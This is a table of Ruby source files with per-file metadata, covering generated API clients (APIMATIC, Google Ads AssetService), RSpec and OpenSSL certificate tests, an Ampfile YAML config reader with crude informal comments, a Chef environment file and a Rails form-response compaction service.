hexsha (string, length 40) | size (int64, 2–1.01M) | content (string, 2–1.01M) | avg_line_length (float64, 1.5–100) | max_line_length (int64, 2–1k) | alphanum_fraction (float64, 0.25–1)
---|---|---|---|---|---|
e28ae1b18e814eb4895ff6e1fd46d4b5658128c2 | 567 | # global_miles_e_commerce_api
#
# This file was automatically generated by APIMATIC v2.0
# ( https://apimatic.io ).
module GlobalMilesECommerceApi
# Represents an Http call in context.
class HttpContext
attr_accessor :request, :response
# The constructor.
# @param [HttpRequest] request An HttpRequest object representing the HTTP request.
# @param [HttpResponse] response An HttpResponse object representing the HTTP
# response.
def initialize(request, response)
@request = request
@response = response
end
end
end
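# Usage sketch (not part of the generated file): HttpContext just pairs a request
# with its response. The `http_request` and `http_response` values below are
# hypothetical stand-ins for whatever the SDK's HTTP layer produces.
#
#   context = GlobalMilesECommerceApi::HttpContext.new(http_request, http_response)
#   context.request   # => the HttpRequest that was sent
#   context.response  # => the HttpResponse that came back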
| 27 | 80 | 0.698413 |
b95c75fd72b37ffc28a784f874dc74ffd9435ad4 | 1,274 | require 'rails_helper'
describe MmsResourcesController, type: :controller do
describe '#index' do
let(:files) { [ double(:files) ] }
before do
allow(MmsResource).to receive(:all) { files }
get :index
end
it 'assigns @files' do
expect(assigns(:files)).to eq(files)
end
it 'returns a 200' do
expect(response).to have_http_status(:ok)
end
end
describe '#create' do
let(:twilio_request_params) do
{
NumMedia: 1,
MediaContentType0: 'image/jpeg',
MediaUrl0: 'https://c1.staticflickr.com/3/2899/14341091933_1e92e62d12_b.jpg',
MessageSid: 'MMd48e71771d0e65ec0db7964d261bc6ff'
}
end
before do |example|
expect_any_instance_of(Twilio::REST::Client)
.to receive_message_chain(:api, :accounts, :messages, :media, :delete)
unless example.metadata[:skip_on_before]
post :create, params: twilio_request_params
end
end
it 'saves the resource to the database', :skip_on_before do
expect { post :create, params: twilio_request_params }
.to change(MmsResource, :count).by(1)
expect(response.body).to include('Thanks for sending us 1 file(s)!')
expect(response).to have_http_status(:ok)
end
end
end
| 27.106383 | 85 | 0.654631 |
289994d17bca8f3a241b7845d8dc58eeb928cd19 | 6,366 | # frozen_string_literal: false
require_relative "utils"
if defined?(OpenSSL)
class OpenSSL::TestX509Certificate < OpenSSL::TestCase
def setup
super
@rsa1024 = Fixtures.pkey("rsa1024")
@rsa2048 = Fixtures.pkey("rsa2048")
@dsa256 = Fixtures.pkey("dsa256")
@dsa512 = Fixtures.pkey("dsa512")
@ca = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=CA")
@ee1 = OpenSSL::X509::Name.parse("/DC=org/DC=ruby-lang/CN=EE1")
end
def test_serial
[1, 2**32, 2**100].each{|s|
cert = issue_cert(@ca, @rsa2048, s, [], nil, nil)
assert_equal(s, cert.serial)
cert = OpenSSL::X509::Certificate.new(cert.to_der)
assert_equal(s, cert.serial)
}
end
def test_public_key
exts = [
["basicConstraints","CA:TRUE",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
]
[
@rsa1024, @rsa2048, @dsa256, @dsa512,
].each{|pk|
cert = issue_cert(@ca, pk, 1, exts, nil, nil)
assert_equal(cert.extensions.sort_by(&:to_s)[2].value,
OpenSSL::TestUtils.get_subject_key_id(cert))
cert = OpenSSL::X509::Certificate.new(cert.to_der)
assert_equal(cert.extensions.sort_by(&:to_s)[2].value,
OpenSSL::TestUtils.get_subject_key_id(cert))
}
end
def test_validity
now = Time.at(Time.now.to_i + 0.9)
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil,
not_before: now, not_after: now+3600)
assert_equal(Time.at(now.to_i), cert.not_before)
assert_equal(Time.at(now.to_i+3600), cert.not_after)
now = Time.at(now.to_i)
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil,
not_before: now, not_after: now+3600)
assert_equal(now.getutc, cert.not_before)
assert_equal((now+3600).getutc, cert.not_after)
now = Time.at(0)
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil,
not_before: now, not_after: now)
assert_equal(now.getutc, cert.not_before)
assert_equal(now.getutc, cert.not_after)
now = Time.at(0x7fffffff)
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil,
not_before: now, not_after: now)
assert_equal(now.getutc, cert.not_before)
assert_equal(now.getutc, cert.not_after)
end
def test_extension
ca_exts = [
["basicConstraints","CA:TRUE",true],
["keyUsage","keyCertSign, cRLSign",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
]
ca_cert = issue_cert(@ca, @rsa2048, 1, ca_exts, nil, nil)
ca_cert.extensions.each_with_index{|ext, i|
assert_equal(ca_exts[i].first, ext.oid)
assert_equal(ca_exts[i].last, ext.critical?)
}
ee1_exts = [
["keyUsage","Non Repudiation, Digital Signature, Key Encipherment",true],
["subjectKeyIdentifier","hash",false],
["authorityKeyIdentifier","keyid:always",false],
["extendedKeyUsage","clientAuth, emailProtection, codeSigning",false],
["subjectAltName","email:[email protected]",false],
]
ee1_cert = issue_cert(@ee1, @rsa1024, 2, ee1_exts, ca_cert, @rsa2048)
assert_equal(ca_cert.subject.to_der, ee1_cert.issuer.to_der)
ee1_cert.extensions.each_with_index{|ext, i|
assert_equal(ee1_exts[i].first, ext.oid)
assert_equal(ee1_exts[i].last, ext.critical?)
}
end
def test_sign_and_verify_rsa_sha1
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil, digest: "sha1")
assert_equal(false, cert.verify(@rsa1024))
assert_equal(true, cert.verify(@rsa2048))
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa256) })
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa512) })
cert.serial = 2
assert_equal(false, cert.verify(@rsa2048))
end
def test_sign_and_verify_rsa_md5
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil, digest: "md5")
assert_equal(false, cert.verify(@rsa1024))
assert_equal(true, cert.verify(@rsa2048))
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa256) })
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa512) })
cert.subject = @ee1
assert_equal(false, cert.verify(@rsa2048))
rescue OpenSSL::X509::CertificateError # RHEL7 disables MD5
end
def test_sign_and_verify_dsa
cert = issue_cert(@ca, @dsa512, 1, [], nil, nil)
assert_equal(false, certificate_error_returns_false { cert.verify(@rsa1024) })
assert_equal(false, certificate_error_returns_false { cert.verify(@rsa2048) })
assert_equal(false, cert.verify(@dsa256))
assert_equal(true, cert.verify(@dsa512))
cert.not_after = Time.now
assert_equal(false, cert.verify(@dsa512))
end
def test_sign_and_verify_rsa_dss1
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil, digest: OpenSSL::Digest::DSS1.new)
assert_equal(false, cert.verify(@rsa1024))
assert_equal(true, cert.verify(@rsa2048))
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa256) })
assert_equal(false, certificate_error_returns_false { cert.verify(@dsa512) })
cert.subject = @ee1
assert_equal(false, cert.verify(@rsa2048))
rescue OpenSSL::X509::CertificateError
end if defined?(OpenSSL::Digest::DSS1)
def test_sign_and_verify_dsa_md5
assert_raise(OpenSSL::X509::CertificateError){
issue_cert(@ca, @dsa512, 1, [], nil, nil, digest: "md5")
}
end
def test_dsa_with_sha2
cert = issue_cert(@ca, @dsa256, 1, [], nil, nil, digest: "sha256")
assert_equal("dsa_with_SHA256", cert.signature_algorithm)
# TODO: need more tests for dsa + sha2
# SHA1 is allowed from OpenSSL 1.0.0 (0.9.8 requires DSS1)
cert = issue_cert(@ca, @dsa256, 1, [], nil, nil, digest: "sha1")
assert_equal("dsaWithSHA1", cert.signature_algorithm)
end
def test_check_private_key
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil)
assert_equal(true, cert.check_private_key(@rsa2048))
end
def test_read_from_file
cert = issue_cert(@ca, @rsa2048, 1, [], nil, nil)
Tempfile.create("cert") { |f|
f << cert.to_pem
f.rewind
assert_equal cert.to_der, OpenSSL::X509::Certificate.new(f).to_der
}
end
private
def certificate_error_returns_false
yield
rescue OpenSSL::X509::CertificateError
false
end
end
end
| 34.978022 | 88 | 0.669808 |
18d99d419e525fb607ce7d02d2839a5780e25012 | 5,426 | ##################################################################
# Licensing Information #
# #
# The following code is licensed, as standalone code, under #
# the Ruby License, unless otherwise directed within the code. #
# #
# For information on the license of this code when distributed #
# with and used in conjunction with the other modules in the #
# Amp project, please see the root-level LICENSE file. #
# #
# © Michael J. Edgar and Ari Brown, 2009-2010 #
# #
##################################################################
module Amp
##
# This deals with the configuration file for amp that is located in the top of
# the Ampfile. The hierarchy of config files now is as such:
#
# LEAST
# /etc/
# ~/
# /your_repo/.hg/hgrc
# /your_repo/Ampfile
# MOST
# =======================
#
# The Ampfile's config-ness is simple: it's a header, some content, and a
# footer. Simple. Easy. Sleek. It is Blue Steel in code form. Just fyi, I
# just got to watch a movie with two hot twins. Be proud.
#
# NOW, Mike said that he didn't want to be restricted to just YAML. I'm not
# going to bake in three levels of abstraction to get a nice way to switch
# out between YAML and PythonConfig and Diffie-Hellmann encoding. Instead,
# I'm going to just document this really well and make it very simple to
# write your own extension for this.
class AmpfileConfig
require 'yaml' # suck it bitches this will always load
# The header and footer are content-agnostic.
# You can change them as you please, even though they are constants.
# Amp::AmpfileConfig::HEADER.replace "# lolcat"
HEADER = "########\n" # 8 #s
FOOTER = "########\n" # 8 #s
attr_accessor :file
attr_accessor :config
def initialize(filename)
@file = filename
# basically all we do here is move the index of where we are in the file
Kernel::open filename, 'r' do |f|
header f # chew the header
cntnt = content f # get the content. can be an empty string
interpret cntnt # assign the interpreted content to @config
end # and bail the fuck out of there
end
##
# We'll start by chewing up the header.
#
# @param [IO, #read] open_file An already opened file handle from which
# we'll read.
# @return [nil]
def header(open_file)
until open_file.readline == HEADER # this is becoming a bad habit of tonight
end # (timeline hint: #content was written first)
end
##
# Next up in this kitchen, we need to deal with the content. Shall we?
# For those counting at home, this is content-agnostic. Easy with that
# delete key, there, eeeeeeeeasy girl...
#
# This method takes the content AND THE FOOTER from an open file
# handle +open_file+.
#
# @param [IO, #read] open_file An already opened file handle from which
# we'll read.
# @return [String] The content that needs to be parsed somehow.
def content(open_file)
lines = []
# Sup coolkid. We're taking advantage of the side effect here. It's generally
# unwise, but what can I say, I like to take risks; I ride my bike without a
# helmet.
until (lines << open_file.readline).last == FOOTER # compare the freshly pushed line, not the array
end
lines.pop # I figure this is overall cheaper than doing lines[0..-2].join ''
lines.join '' # The world may never know
end
##
# This is the only content-dependent part. If you were to override a method,
# pick this one. This interprets the content (+cntnt+) and stores it in the
# @config variable.
#
# @param [String] cntnt The content that we need to interpret.
def interpret(cntnt)
@config = YAML::load cntnt
#@config =
end
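# As the comment above invites, swapping the encoding is a one-method override.
# A minimal sketch, assuming a hypothetical subclass that stores the section as JSON:
#
#   class JsonAmpfileConfig < AmpfileConfig
#     def interpret(cntnt)
#       require 'json'
#       @config = JSON.parse cntnt
#     end
#   end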
def [](*args)
@config[*args]
end
def []=(*args)
@config.send :[]=, *args # due to syntax oddities
end
def save!
# Do nothing, because we can't really save back to the Ampfile. Adjustable
# length heading? I should hope not. Let's just perform a O(lm) insertion
# where l is the difference in the size of the headers and m is the length
# of the rest of the Ampfile. Worst case is O(n^2) if l = m. Let's take a
# note from Google on this one: if you want shit to be fast, don't let
# anything slow be introduced.
# Ah, fuck it, let's just get this feature in there anyways and see if it
# actually slows shit down.
data = File.read @file
pointer = nil
Kernel::open @file, 'r' do |f|
header f
content f # throw it away, we're just looking for the index pointer
pointer = f.pos
end # gtfo
# yeah, fuck it, i just want to get to bed. change the #to_yaml to whatever you want
text = HEADER + @config.to_yaml + FOOTER + data[pointer..-1]
Kernel::open(@file, 'w') {|f| f.write text } # write it in place
true # success marker
end
end
end
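# Usage sketch, assuming an Ampfile whose config section sits between the default
# 8-'#' HEADER and FOOTER lines with YAML in between (the keys below are made up):
#
#   ########
#   verbose: true
#   style: colorful
#   ########
#
#   config = Amp::AmpfileConfig.new 'Ampfile'
#   config['verbose']        # => true
#   config['style'] = 'plain'
#   config.save!             # rewrites the YAML between HEADER and FOOTER in place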
| 37.680556 | 90 | 0.570217 |
33d06f64902b29998505c6f950ee90ac34ca46ff | 105 | name "cucumber"
description "cucumber test environment"
default_attributes(
'ENV' => "production"
)
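# Usage sketch: on a node pinned to this "cucumber" environment, the default
# attribute above is readable from recipes as node['ENV'] # => "production"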
| 15 | 39 | 0.733333 |
d5e466d45f3a7ba5fa2189f85670410d3e3a9fae | 24,827 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
# require "google/ads/google_ads/error"
require "google/ads/googleads/v8/services/asset_service_pb"
module Google
module Ads
module GoogleAds
module V8
module Services
module AssetService
##
# Client for the AssetService service.
#
# Service to manage assets. Asset types that can be created with AssetService are
# YoutubeVideoAsset, MediaBundleAsset and ImageAsset. TextAsset should be
# created with Ad inline.
#
class Client
include Paths
# @private
attr_reader :asset_service_stub
##
# Configure the AssetService Client class.
#
# See {::Google::Ads::GoogleAds::V8::Services::AssetService::Client::Configuration}
# for a description of the configuration fields.
#
# @example
#
# # Modify the configuration for all AssetService clients
# ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.configure do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def self.configure
@configure ||= begin
default_config = Client::Configuration.new
default_config.timeout = 3600.0
default_config.retry_policy = {
initial_delay: 5.0, max_delay: 60.0, multiplier: 1.3, retry_codes: [14, 4]
}
default_config
end
yield @configure if block_given?
@configure
end
##
# Configure the AssetService Client instance.
#
# The configuration is set to the derived mode, meaning that values can be changed,
# but structural changes (adding new fields, etc.) are not allowed. Structural changes
# should be made on {Client.configure}.
#
# See {::Google::Ads::GoogleAds::V8::Services::AssetService::Client::Configuration}
# for a description of the configuration fields.
#
# @yield [config] Configure the Client client.
# @yieldparam config [Client::Configuration]
#
# @return [Client::Configuration]
#
def configure
yield @config if block_given?
@config
end
##
# Create a new AssetService client object.
#
# @example
#
# # Create a client using the default configuration
# client = ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.new
#
# # Create a client using a custom configuration
# client = ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.new do |config|
# config.timeout = 10.0
# end
#
# @yield [config] Configure the AssetService client.
# @yieldparam config [Client::Configuration]
#
def initialize
# These require statements are intentionally placed here to initialize
# the gRPC module only when it's required.
# See https://github.com/googleapis/toolkit/issues/446
require "gapic/grpc"
require "google/ads/googleads/v8/services/asset_service_services_pb"
# Create the configuration object
@config = Configuration.new Client.configure
# Yield the configuration if needed
yield @config if block_given?
# Create credentials
credentials = @config.credentials
# Use self-signed JWT if the endpoint is unchanged from default,
# but only if the default endpoint does not have a region prefix.
enable_self_signed_jwt = @config.endpoint == Client.configure.endpoint &&
!@config.endpoint.split(".").first.include?("-")
credentials ||= Credentials.default scope: @config.scope,
enable_self_signed_jwt: enable_self_signed_jwt
if credentials.is_a?(::String) || credentials.is_a?(::Hash)
credentials = Credentials.new credentials, scope: @config.scope
end
@quota_project_id = @config.quota_project
@quota_project_id ||= credentials.quota_project_id if credentials.respond_to? :quota_project_id
@asset_service_stub = ::Gapic::ServiceStub.new(
::Google::Ads::GoogleAds::V8::Services::AssetService::Stub,
credentials: credentials,
endpoint: @config.endpoint,
channel_args: @config.channel_args,
interceptors: @config.interceptors
)
end
# Service calls
##
# Returns the requested asset in full detail.
#
# List of thrown errors:
# [AuthenticationError]()
# [AuthorizationError]()
# [HeaderError]()
# [InternalError]()
# [QuotaError]()
# [RequestError]()
#
# @overload get_asset(request, options = nil)
# Pass arguments to `get_asset` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::GetAssetRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::GetAssetRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g., timeout, retries, etc. Optional.
#
# @overload get_asset(resource_name: nil)
# Pass arguments to `get_asset` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param resource_name [::String]
# Required. The resource name of the asset to fetch.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Resources::Asset]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Resources::Asset]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def get_asset request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request, to: ::Google::Ads::GoogleAds::V8::Services::GetAssetRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.get_asset.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"resource_name" => request.resource_name
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.get_asset.timeout,
metadata: metadata,
retry_policy: @config.rpcs.get_asset.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@asset_service_stub.call_rpc :get_asset, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Creates assets. Operation statuses are returned.
#
# List of thrown errors:
# [AssetError]()
# [AuthenticationError]()
# [AuthorizationError]()
# [CollectionSizeError]()
# [CurrencyCodeError]()
# [DatabaseError]()
# [DateError]()
# [DistinctError]()
# [FieldError]()
# [FieldMaskError]()
# [HeaderError]()
# [IdError]()
# [InternalError]()
# [ListOperationError]()
# [MediaUploadError]()
# [MutateError]()
# [NotAllowlistedError]()
# [NotEmptyError]()
# [OperatorError]()
# [QuotaError]()
# [RangeError]()
# [RequestError]()
# [SizeLimitError]()
# [StringFormatError]()
# [StringLengthError]()
# [UrlFieldError]()
# [YoutubeVideoRegistrationError]()
#
# @overload mutate_assets(request, options = nil)
# Pass arguments to `mutate_assets` via a request object, either of type
# {::Google::Ads::GoogleAds::V8::Services::MutateAssetsRequest} or an equivalent Hash.
#
# @param request [::Google::Ads::GoogleAds::V8::Services::MutateAssetsRequest, ::Hash]
# A request object representing the call parameters. Required. To specify no
# parameters, or to keep all the default parameter values, pass an empty Hash.
# @param options [::Gapic::CallOptions, ::Hash]
# Overrides the default settings for this call, e.g., timeout, retries, etc. Optional.
#
# @overload mutate_assets(customer_id: nil, operations: nil, partial_failure: nil, response_content_type: nil, validate_only: nil)
# Pass arguments to `mutate_assets` via keyword arguments. Note that at
# least one keyword argument is required. To specify no parameters, or to keep all
# the default parameter values, pass an empty Hash as a request object (see above).
#
# @param customer_id [::String]
# Required. The ID of the customer whose assets are being modified.
# @param operations [::Array<::Google::Ads::GoogleAds::V8::Services::AssetOperation, ::Hash>]
# Required. The list of operations to perform on individual assets.
# @param partial_failure [::Boolean]
# If true, successful operations will be carried out and invalid
# operations will return errors. If false, all operations will be carried
# out in one transaction if and only if they are all valid.
# Default is false.
# @param response_content_type [::Google::Ads::GoogleAds::V8::Enums::ResponseContentTypeEnum::ResponseContentType]
# The response content type setting. Determines whether the mutable resource
# or just the resource name should be returned post mutation.
# @param validate_only [::Boolean]
# If true, the request is validated but not executed. Only errors are
# returned, not results.
#
# @yield [response, operation] Access the result along with the RPC operation
# @yieldparam response [::Google::Ads::GoogleAds::V8::Services::MutateAssetsResponse]
# @yieldparam operation [::GRPC::ActiveCall::Operation]
#
# @return [::Google::Ads::GoogleAds::V8::Services::MutateAssetsResponse]
#
# @raise [Google::Ads::GoogleAds::Error] if the RPC is aborted.
#
def mutate_assets request, options = nil
raise ::ArgumentError, "request must be provided" if request.nil?
request = ::Gapic::Protobuf.coerce request,
to: ::Google::Ads::GoogleAds::V8::Services::MutateAssetsRequest
# Converts hash and nil to an options object
options = ::Gapic::CallOptions.new(**options.to_h) if options.respond_to? :to_h
# Customize the options with defaults
metadata = @config.rpcs.mutate_assets.metadata.to_h
# Set x-goog-api-client and x-goog-user-project headers
metadata[:"x-goog-api-client"] ||= ::Gapic::Headers.x_goog_api_client \
lib_name: @config.lib_name, lib_version: @config.lib_version,
gapic_version: ::Google::Ads::GoogleAds::VERSION
metadata[:"x-goog-user-project"] = @quota_project_id if @quota_project_id
header_params = {
"customer_id" => request.customer_id
}
request_params_header = header_params.map { |k, v| "#{k}=#{v}" }.join("&")
metadata[:"x-goog-request-params"] ||= request_params_header
options.apply_defaults timeout: @config.rpcs.mutate_assets.timeout,
metadata: metadata,
retry_policy: @config.rpcs.mutate_assets.retry_policy
options.apply_defaults timeout: @config.timeout,
metadata: @config.metadata,
retry_policy: @config.retry_policy
@asset_service_stub.call_rpc :mutate_assets, request, options: options do |response, operation|
yield response, operation if block_given?
return response
end
# rescue GRPC::BadStatus => grpc_error
# raise Google::Ads::GoogleAds::Error.new grpc_error.message
end
##
# Configuration class for the AssetService API.
#
# This class represents the configuration for AssetService,
# providing control over timeouts, retry behavior, logging, transport
# parameters, and other low-level controls. Certain parameters can also be
# applied individually to specific RPCs. See
# {::Google::Ads::GoogleAds::V8::Services::AssetService::Client::Configuration::Rpcs}
# for a list of RPCs that can be configured independently.
#
# Configuration can be applied globally to all clients, or to a single client
# on construction.
#
# @example
#
# # Modify the global config, setting the timeout for
# # get_asset to 20 seconds,
# # and all remaining timeouts to 10 seconds.
# ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.configure do |config|
# config.timeout = 10.0
# config.rpcs.get_asset.timeout = 20.0
# end
#
# # Apply the above configuration only to a new client.
# client = ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.new do |config|
# config.timeout = 10.0
# config.rpcs.get_asset.timeout = 20.0
# end
#
# @!attribute [rw] endpoint
# The hostname or hostname:port of the service endpoint.
# Defaults to `"googleads.googleapis.com"`.
# @return [::String]
# @!attribute [rw] credentials
# Credentials to send with calls. You may provide any of the following types:
# * (`String`) The path to a service account key file in JSON format
# * (`Hash`) A service account key as a Hash
# * (`Google::Auth::Credentials`) A googleauth credentials object
# (see the [googleauth docs](https://googleapis.dev/ruby/googleauth/latest/index.html))
# * (`Signet::OAuth2::Client`) A signet oauth2 client object
# (see the [signet docs](https://googleapis.dev/ruby/signet/latest/Signet/OAuth2/Client.html))
# * (`GRPC::Core::Channel`) a gRPC channel with included credentials
# * (`GRPC::Core::ChannelCredentials`) a gRPC credentials object
# * (`nil`) indicating no credentials
# @return [::Object]
# @!attribute [rw] scope
# The OAuth scopes
# @return [::Array<::String>]
# @!attribute [rw] lib_name
# The library name as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] lib_version
# The library version as recorded in instrumentation and logging
# @return [::String]
# @!attribute [rw] channel_args
# Extra parameters passed to the gRPC channel. Note: this is ignored if a
# `GRPC::Core::Channel` object is provided as the credential.
# @return [::Hash]
# @!attribute [rw] interceptors
# An array of interceptors that are run before calls are executed.
# @return [::Array<::GRPC::ClientInterceptor>]
# @!attribute [rw] timeout
# The call timeout in seconds.
# @return [::Numeric]
# @!attribute [rw] metadata
# Additional gRPC headers to be sent with the call.
# @return [::Hash{::Symbol=>::String}]
# @!attribute [rw] retry_policy
# The retry policy. The value is a hash with the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
# @return [::Hash]
# @!attribute [rw] quota_project
# A separate project against which to charge quota.
# @return [::String]
#
class Configuration
extend ::Gapic::Config
config_attr :endpoint, "googleads.googleapis.com", ::String
config_attr :credentials, nil do |value|
allowed = [::String, ::Hash, ::Proc, ::Symbol, ::Google::Auth::Credentials, ::Signet::OAuth2::Client,
nil]
allowed += [::GRPC::Core::Channel, ::GRPC::Core::ChannelCredentials] if defined? ::GRPC
allowed.any? { |klass| klass === value }
end
config_attr :scope, nil, ::String, ::Array, nil
config_attr :lib_name, nil, ::String, nil
config_attr :lib_version, nil, ::String, nil
config_attr(:channel_args, { "grpc.service_config_disable_resolution" => 1 }, ::Hash, nil)
config_attr :interceptors, nil, ::Array, nil
config_attr :timeout, nil, ::Numeric, nil
config_attr :metadata, nil, ::Hash, nil
config_attr :retry_policy, nil, ::Hash, ::Proc, nil
config_attr :quota_project, nil, ::String, nil
# @private
def initialize parent_config = nil
@parent_config = parent_config unless parent_config.nil?
yield self if block_given?
end
##
# Configurations for individual RPCs
# @return [Rpcs]
#
def rpcs
@rpcs ||= begin
parent_rpcs = nil
parent_rpcs = @parent_config.rpcs if defined?(@parent_config) && @parent_config.respond_to?(:rpcs)
Rpcs.new parent_rpcs
end
end
##
# Configuration RPC class for the AssetService API.
#
# Includes fields providing the configuration for each RPC in this service.
# Each configuration object is of type `Gapic::Config::Method` and includes
# the following configuration fields:
#
# * `timeout` (*type:* `Numeric`) - The call timeout in seconds
# * `metadata` (*type:* `Hash{Symbol=>String}`) - Additional gRPC headers
# * `retry_policy` (*type:* `Hash`) - The retry policy. The policy fields
# include the following keys:
# * `:initial_delay` (*type:* `Numeric`) - The initial delay in seconds.
# * `:max_delay` (*type:* `Numeric`) - The max delay in seconds.
# * `:multiplier` (*type:* `Numeric`) - The incremental backoff multiplier.
# * `:retry_codes` (*type:* `Array<String>`) - The error codes that should
# trigger a retry.
#
class Rpcs
##
# RPC-specific configuration for `get_asset`
# @return [::Gapic::Config::Method]
#
attr_reader :get_asset
##
# RPC-specific configuration for `mutate_assets`
# @return [::Gapic::Config::Method]
#
attr_reader :mutate_assets
# @private
def initialize parent_rpcs = nil
get_asset_config = parent_rpcs.get_asset if parent_rpcs.respond_to? :get_asset
@get_asset = ::Gapic::Config::Method.new get_asset_config
mutate_assets_config = parent_rpcs.mutate_assets if parent_rpcs.respond_to? :mutate_assets
@mutate_assets = ::Gapic::Config::Method.new mutate_assets_config
yield self if block_given?
end
end
end
end
end
end
end
end
end
end
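# Usage sketch (hypothetical customer and asset IDs; credentials and the rest of
# the Google Ads setup are assumed to be configured as described in the
# Configuration docs above):
#
#   client = ::Google::Ads::GoogleAds::V8::Services::AssetService::Client.new do |config|
#     config.timeout = 20.0
#   end
#
#   asset = client.get_asset resource_name: "customers/1234567890/assets/111"
#   puts asset.resource_name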
| 49.654 | 144 | 0.530028 |
e2890385e37dbc77a73e04b9b5c11d4d8411abed | 1,699 | class CompactFormResponseChangesService < CivilService::Service
attr_reader :scope, :send_mail
def initialize(scope:)
@scope = scope.not_compacted
end
private
def inner_call
convention_ids_with_pending_changes.each do |convention_id|
all_pending_changes = scope.joins(:user_con_profile)
.where(user_con_profiles: { convention_id: convention_id })
response_ids = all_pending_changes.pluck(Arel.sql('distinct response_id'))
response_ids.each do |response_id|
compact_response_id(response_id)
end
end
success
end
def convention_ids_with_pending_changes
@convention_ids_with_pending_changes ||= scope.joins(:user_con_profile)
.pluck(Arel.sql('distinct user_con_profiles.convention_id'))
end
def compact_response_id(response_id)
ActiveRecord::Base.transaction do
raw_changes = scope.includes(:user_con_profile).where(response_id: response_id)
# skip compacting responses where changes are ongoing
unless raw_changes.where('created_at >= ?', 1.hour.ago).any?
compact_changes(response_id, raw_changes.to_a)
end
end
end
def compact_changes(response_id, raw_changes)
compacted_changes = CompactingFormResponseChangesPresenter.new(raw_changes).compacted_changes
compacted_changes.each do |change|
created_at = change.created_at
updated_at = change.updated_at
change.save!
change.update_columns(created_at: created_at, updated_at: updated_at)
end
logger.debug "Response #{response_id}: compacted #{raw_changes.size} changes to \
#{compacted_changes.size}"
FormResponseChange.where(id: raw_changes.map(&:id)).delete_all
end
end
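# Usage sketch (assumes the CivilService::Service convention of invoking services
# via `.call` and checking `success?` on the returned result object):
#
#   result = CompactFormResponseChangesService.new(scope: FormResponseChange.all).call
#   result.success? # => true once eligible responses have been compacted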
| 32.056604 | 97 | 0.747499 |
38023e840442cd1b807d4da45d8dd61a41735275 | 82 | require 'multidiff/differ'
require 'multidiff/runner'
require 'multidiff/version'
| 20.5 | 27 | 0.817073 |
d54d86e8880a46e0de6d6353a4fbe2473db9509e | 109,467 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'seahorse/client/plugins/content_length.rb'
require 'aws-sdk-core/plugins/credentials_configuration.rb'
require 'aws-sdk-core/plugins/logging.rb'
require 'aws-sdk-core/plugins/param_converter.rb'
require 'aws-sdk-core/plugins/param_validator.rb'
require 'aws-sdk-core/plugins/user_agent.rb'
require 'aws-sdk-core/plugins/helpful_socket_errors.rb'
